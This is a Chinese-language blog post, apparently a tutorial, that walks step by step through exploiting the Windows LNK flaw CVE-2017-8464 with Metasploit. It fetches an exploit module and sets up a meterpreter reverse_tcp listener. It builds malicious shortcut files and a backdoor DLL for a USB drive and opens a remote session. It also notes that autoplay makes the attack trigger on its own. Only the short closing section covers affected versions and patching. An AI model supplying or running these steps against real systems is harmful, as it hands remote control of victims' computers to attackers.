msf下的LNK漏洞（CVE-2017-8464）利用

迷南。 2024-04-07 11:05 61阅读 0赞

#### 0x01 前言 ####

RCE漏洞存在于Windows处理LNK文件的环节。攻击者利用漏洞可以获得与本地用户相同的用户权限。被使用此漏洞攻击时，用户权限较少的账户相较管理员权限的用户受到的影响更小。

攻击者可以给受害者一个恶意的LNK 文件和关联的恶意二进制，文件可以存放在可移动磁盘或远程共享中。当用户用 Windows 资源管理器或任何其他能够解析LNK文件的软件，打开此驱动器 (或远程共享) 时，恶意文件就会在目标系统上执行攻击者的代码。

#### 0x02 漏洞环境搭建与利用 ####

**漏洞环境搭建：**

kalix86 192.168.1.109 攻击机

windows7x64 192.168.1.101 目标靶机

**漏洞利用：**

1.kali主机下载cve\_2017\_8464\_lnk\_rce.rb：

cd  /opt
    wget  https://raw.githubusercontent.com/ykoster/metasploit-framework/169e00bf3442447324df064192db62cdc5b5b860/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb

![516e459277a90f4ebff40a33f33ff521.png][]

2.将cve\_2017\_8464\_lnk\_rce.rb拷贝到

/usr/share/metasploit-framework/modules/exploit/windows/smb/目录下：

cp  cve_2017_8464_lnk_rce.rb  /usr/share/metasploit-framework/modules/exploits/windows/smb/

![416f4f9642f50a64ba5fbde09bf69990.png][]

3.生成监听shell:

msf > use exploit/multi/handler
    
    msf  exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    
    msf exploit(handler) > set LHOST 192.168.1.109
    
    msf exploit(handler) > exploit -j

![aee5141e329151a3fdde73062b3d1d7d.png][]

4生成大量的.LNK文件(对应盘符从D盘到Z盘)和要加载的.dll文件(后门文件, copy了一个lnk文件(根据插入靶机U盘后识别的盘符，例如我插入U盘后显示的E盘，所以就选择了E结尾的lnk文件)和dll文件到U盘)

msf exploit(handler) > back
    
    msf > use exploit/windows/smb/cve_2017_8464_lnk_rce
    
    msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
    
    msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.1.109
    
    msf exploit(cve_2017_8464_lnk_rce) > exploit

![c8177f9b55c5746c261ca61056af3966.png][]

5.将/root/.msf4/local/\*所有文件拷贝到/opt目录下的test文件夹中，然后拷贝到目标靶机windows7X64上

root@backlion:~# cd /opt
    
    root@backlion:/opt# mkdir test
    
    root@backlion:/opt# cp  /root/.msf4/local/*   test/
    
    root@backlion:/opt# cd  test/
    
    root@backlion:/opt/test# ls

![e337bfd0c597dbcc86a92cab2087efd8.png][]

拷贝的本机win7x64上：

![dc82d5e9c7a8c71e848d1ab59d89d6b6.png][]

6.然后点击快捷键，就会触发注册dll文件，如果不行直接注册dll文件(一般是将这项快捷键和DLL文件拷贝到一个文件夹里面然后拷贝到U盘，只要对方开了U盘自动启动播放功能，就会自动触发注册dll文件)

![5e8ce81b6edc96ac8b03b056b933e64b.png][]

7.在kali下可以看到成功获得sesions会话为1

sessions  -i 1

![883b158043b29bd30802572e2c9d2caf.png][]

8.然后进入到会话，就会成功进入到metermter的shell界面：

![628d782653775bb1cd9d3f54ea46221c.png][]

#### 0x03漏洞影响与修复 ####

**漏洞影响：**

Windows 10

Windows 7

Windows 8.1

Windows RT 8.1

Windows Server 2008

Windows Server 2008 R2

Windows Server 2012

Windows Server 2012 R2

Windows Server 2016

**漏洞修复：**

下载补丁，其地址为：

https://support.microsoft.com/zh-cn/help/4025686/microsoft-security-advisory-4025685-guidance-for-supported-platforms

[516e459277a90f4ebff40a33f33ff521.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/c5a22e6f0bfb485491d30e0f42ed6fe1.png
[416f4f9642f50a64ba5fbde09bf69990.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/469d187f310b41b6985fbc6edf73b639.png
[aee5141e329151a3fdde73062b3d1d7d.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/4834bd6710cb4834b0f6ed4226cbb4ae.png
[c8177f9b55c5746c261ca61056af3966.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/5c8ad0641a9747a09e3d303e1f7d643f.png
[e337bfd0c597dbcc86a92cab2087efd8.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/05e873687d8546b7868a5cff921d9bd2.png
[dc82d5e9c7a8c71e848d1ab59d89d6b6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/47f52f67c62944c39e89bda2a3e55611.png
[5e8ce81b6edc96ac8b03b056b933e64b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/ccfa7f0a50c148599e177dece30d0255.png
[883b158043b29bd30802572e2c9d2caf.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/e73a9ee97eeb4de490100ddffe265d0b.png
[628d782653775bb1cd9d3f54ea46221c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/07/ea80408d3bba446b876a5e2517033c4a.png